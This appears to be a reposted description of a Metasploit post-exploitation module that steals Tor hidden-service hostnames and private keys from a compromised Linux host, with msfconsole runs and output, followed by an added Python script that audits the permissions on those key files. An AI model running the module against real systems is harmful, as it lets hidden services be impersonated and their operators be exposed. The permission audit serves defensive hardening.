Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credit: xcellerator
This is a clean post-exploitation module that steals the hostnames and private keys of Tor hidden services originating from the target machine. The technique can be applied in advanced footprinting as well as forensics.
Tested against Debian GNU/Linux 8 (kernel version 3.16.0-4-amd64) from Arch Linux (kernel version 4.11.3-1-ARCH).
What it does
- Searches for the Tor configuration file “torrc” (typically /etc/tor/torrc, though the location can vary).
- Parses that file for lines starting with “HiddenServiceDir” to get the locations of the hidden services on the system (again, typically /var/lib/tor/… by default on most distros).
- Finally, loots the files “hostname” and “private_key” found in each of these folders.
Example Output for root session
msf > use post/linux/gather/tor_hiddenservices
msf post(tor_hiddenservices) > set SESSION 1
SESSION => 1
msf post(tor_hiddenservices) > run
[*] Running module against 10.0.2.15
[*] Info:
[*] Debian GNU/Linux 8
[*] Linux hidden 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 GNU/Linux
[*] Looking for torrc...
[+] Torrc file found at /etc/tor/torrc
[+] Hidden Services found!
[*] hidden stored in /home/user/.msf4/loot/20170606210603_default_192.168.1.140_tor.hidden.hostn_479046.txt
[*] hidden stored in /home/user/.msf4/loot/20170606210603_default_192.168.1.140_tor.hidden.priva_933706.txt
[*] Post module execution completed
Example Output for non-root session
msf > use post/linux/gather/tor_hiddenservices
msf post(tor_hiddenservices) > set SESSION 2
SESSION => 2
msf post(tor_hiddenservices) > run
[*] Running module against 10.0.2.15
[*] Info:
[*] Debian GNU/Linux 8
[*] Linux hidden 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 GNU/Linux
[*] Looking for torrc...
[+] Torrc file found at /etc/tor/torrc
[+] Hidden Services found!
[-] Hidden Services were found, but we need root to access the directories
[*] Post module execution completed
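The non-root run above is stopped only by the filesystem permissions on the hidden-service directories. As an added example (not part of the original post or the Metasploit module), this Python check parses a torrc the same way and reports any HiddenServiceDir or key file that is accessible to group or other; the function names and the sample torrc are constructed for illustration.

```python
import os
import stat
import tempfile

KEY_FILES = ("hostname", "private_key")  # file names listed in the post

def hidden_service_dirs(torrc_text):
    """Return the HiddenServiceDir paths declared in torrc text."""
    dirs = []
    for line in torrc_text.splitlines():
        # Drop comments; torrc option names are case-insensitive.
        parts = line.split("#", 1)[0].split(None, 1)
        if len(parts) == 2 and parts[0].lower() == "hiddenservicedir":
            dirs.append(parts[1].strip().strip('"'))
    return dirs

def audit(torrc_path):
    """Return (path, mode) for each service dir or key file open to group/other."""
    with open(torrc_path, encoding="utf-8", errors="replace") as fh:
        dirs = hidden_service_dirs(fh.read())
    findings = []
    for d in dirs:
        for path in [d] + [os.path.join(d, name) for name in KEY_FILES]:
            try:
                mode = stat.S_IMODE(os.stat(path).st_mode)
            except OSError:
                continue  # missing, or already unreachable for this user
            if mode & 0o077:
                findings.append((path, oct(mode)))
    return findings

def build_sample(root, dir_mode, key_mode):
    """Constructed sample: a torrc plus one hidden-service directory under root."""
    svc = os.path.join(root, "hidden_service")
    os.makedirs(svc, exist_ok=True)
    key = os.path.join(svc, "private_key")
    with open(key, "w") as fh:
        fh.write("placeholder, not a real key\n")
    os.chmod(svc, dir_mode)
    os.chmod(key, key_mode)
    torrc = os.path.join(root, "torrc")
    with open(torrc, "w") as fh:
        fh.write("# constructed sample\nSocksPort 9050\n")
        fh.write("HiddenServiceDir %s\nHiddenServicePort 80 127.0.0.1:8080\n" % svc)
    return torrc

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print("weak:    ", audit(build_sample(tmp, 0o755, 0o644)))
        print("hardened:", audit(build_sample(tmp, 0o700, 0o600)))
```

On a real host, call `audit()` with the path of the torrc in use; an empty list means no hidden-service directory or key file it could inspect is open beyond its owner.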